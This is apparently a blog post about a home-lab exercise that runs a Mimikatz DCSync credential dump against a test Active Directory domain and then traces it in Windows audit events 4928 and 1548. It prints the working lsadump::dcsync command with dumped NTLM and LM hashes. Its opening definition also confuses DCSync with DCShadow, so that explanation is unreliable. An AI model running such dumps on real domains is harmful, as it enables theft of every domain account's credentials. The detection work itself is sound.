In this post, I learning about how we can perform and detect a DC Sync attack using Mimikatz. In a DCSync attack, we are standing up a normal computer to act as a domain controller. Once this "normal" computer acts like a domain controller, we can then perform replication, requesting information on a particular user or all users if we wish.
I connected to a workstation as a user with Domain Admin privileges.
C:\Tools\mimikatz_trunk\x64 λ whoami /upn admin@securitynik.local
Confirming the group membership.
C:\Tools\mimikatz_trunk\x64 λ net group "Domain Admins" /domain The request will be processed at a domain controller for domain securitynik.local. Group name Domain Admins Comment Designated administrators of the domain Members ------------------------------------------------------------------------------- mysqlsvc admin Administrator The command completed successfully.
Before going any further, I've configured my Windows 2019 server, to track replication changes.
Group Policy Management -> My Domain Policy ("SecurityNik - Default - Domain Policy") -> Computer Configuration -> Advanced Audit Policy Configuration -> Audit Policies -> DS Access: Detailed Directory Service Replication: Success and Failure Directory Service Access : Success and Failure Active Directory Domain Services Object Changes : Success and Failure Directory Service Replication : Success and Failure.
First up, collecting information about a particular user
C:\Tools\mimikatz_trunk\x64 λ mimikatz.exe "lsadump::dcsync /domain:securitynik.local /user:tq" exit .#####. mimikatz 2.2.0 (x64) #19041 May 19 2020 00:48:59 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > http://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > http://pingcastle.com / http://mysmartlogon.com ***/ mimikatz(commandline) # lsadump::dcsync /domain:securitynik.local /user:tq [DC] 'securitynik.local' will be the domain [DC] 'dc-2019.securitynik.local' will be the DC server [DC] 'tq' will be the user account Object RDN : tq ** SAM ACCOUNT ** SAM Username : tq User Principal Name : tq@securitynik.local Account Type : 30000000 ( USER_OBJECT ) User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD ) Account expiration : Password last change : 10/16/2021 12:55:37 PM Object Security ID : S-1-5-21-2112827174-2190297626-1763567496-1104 Object Relative ID : 1104 Credentials: Hash NTLM: 23e1d10001876b0078a9a779017fc026 ntlm- 0: 23e1d10001876b0078a9a779017fc026 ntlm- 1: 23e1d10001876b0078a9a779017fc026 lm - 0: 28efaa5798e5b2fedee619ea7e0116d4 lm - 1: df03317c4db79c05f4db99852f01f006 Supplemental Credentials: * Primary:NTLM-Strong-NTOWF * Random Value : 81800db4fa61ba2c6cf2164e34759c2a ...
Looking specifically at the Security Event log for event with ID 4928 relating to Detailed Directory Replication, we see the various naming contexts being replicated with SECURITYNIK-WIN. This device is my Windows 10 host and is not a Domain Controller.
An Active Directory replica source naming context was established. Destination DRA: CN=NTDS Settings,CN=DC-2019,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=securitynik,DC=local Source DRA: CN=NTDS Settings,CN=SECURITYNIK-WIN,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=securitynik,DC=local Source Address: 1151663f-94af-4319-a8ad-435763db3875._msdcs.securitynik.local Naming Context: CN=Schema,CN=Configuration,DC=securitynik,DC=local Options: 2147484016 Status Code: 0
An Active Directory replica source naming context was established. Destination DRA: CN=NTDS Settings,CN=DC-2019,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=securitynik,DC=local Source DRA: CN=NTDS Settings,CN=SECURITYNIK-WIN,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=securitynik,DC=local Source Address: 1151663f-94af-4319-a8ad-435763db3875._msdcs.securitynik.local Naming Context: DC=securitynik,DC=local Options: 368 Status Code: 0
Looking at Event 1548 in the Directory Service log, we see:
During replication, Active Directory Domain Services found the following object or its parent object in a directory partition on the local domain controller that is different from the following directory partition from which changes are being replicated. This can occur when the object or its parent object has been moved across partitions. However, due to replication latency, one of the directory servers has not yet received notification of the move. Object: CN=tq,OU=SecurityNik-Users,DC=securitynik,DC=local Object GUID: 7b76ce2a-c5d9-42ec-b246-cba68d5d23ee Parent object GUID (if available): 9234d83c-d3fc-49c0-8024-2eee57d9179b Directory partition: CN=Configuration,DC=securitynik,DC=local Source directory server: 1151663f-94af-4319-a8ad-435763db3875._msdcs.securitynik.local Replication of this directory partition from this source directory server cannot continue at this time. This condition is transient. An attempt to replicate this directory partition will be tried again later.
Invalid DNS configuration may be affecting other essential operations on member computers, domain controllers or application servers in this Active Directory Domain Services forest, including logon authentication or access to network resources. You should immediately resolve this DNS configuration error so that this domain controller can resolve the IP address of the source domain controller using DNS. Alternate server name: SECURITYNIK-WIN10.securitynik.local Failing DNS host name: 1151663f-94af-4319-a8ad-435763db3875._msdcs.securitynik.local
The attempt to establish a replication link for the following writable directory partition failed. Directory partition: CN=Configuration,DC=securitynik,DC=local Source directory service: CN=NTDS Settings,CN=SECURITYNIK-WIN,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=securitynik,DC=local Source directory service address: 1151663f-94af-4319-a8ad-435763db3875._msdcs.securitynik.local Intersite transport (if any):
The attempt to establish a replication link for the following writable directory partition failed. Directory partition: CN=Configuration,DC=securitynik,DC=local Source directory service: CN=NTDS Settings,CN=SECURITYNIK-WIN,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=securitynik,DC=local Source directory service address: 1151663f-94af-4319-a8ad-435763db3875._msdcs.securitynik.local Intersite transport (if any):
There were quite a few errors about this failing in the Directory service log that might suggestion this is a potential issues.
References:
https://www.blackhat.com/docs/us-14/materials/us-14-Duckwall-Abusing-Microsoft-Kerberos-Sorry-You-Guys-Don't-Get-It.pdf
https://stealthbits.com/blog/dcshadow-attacking-active-directory-rogue-dcs/
https://pentestlab.blog/2018/04/16/dcshadow/
https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4928